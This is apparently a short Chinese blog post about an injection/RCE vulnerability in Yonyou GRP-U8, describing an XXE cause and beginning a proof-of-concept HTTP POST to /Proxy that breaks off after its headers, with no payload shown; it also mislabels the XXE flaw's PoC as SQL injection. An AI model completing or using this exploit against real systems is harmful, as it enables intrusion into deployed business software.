用友u8 注入RCE漏洞利用数据
一、漏洞成因
用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。
二、用于SQL注入的POC
POST /Proxy HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.
原创
2021-07-07 16:24:42 ·
1056 阅读 ·
0 评论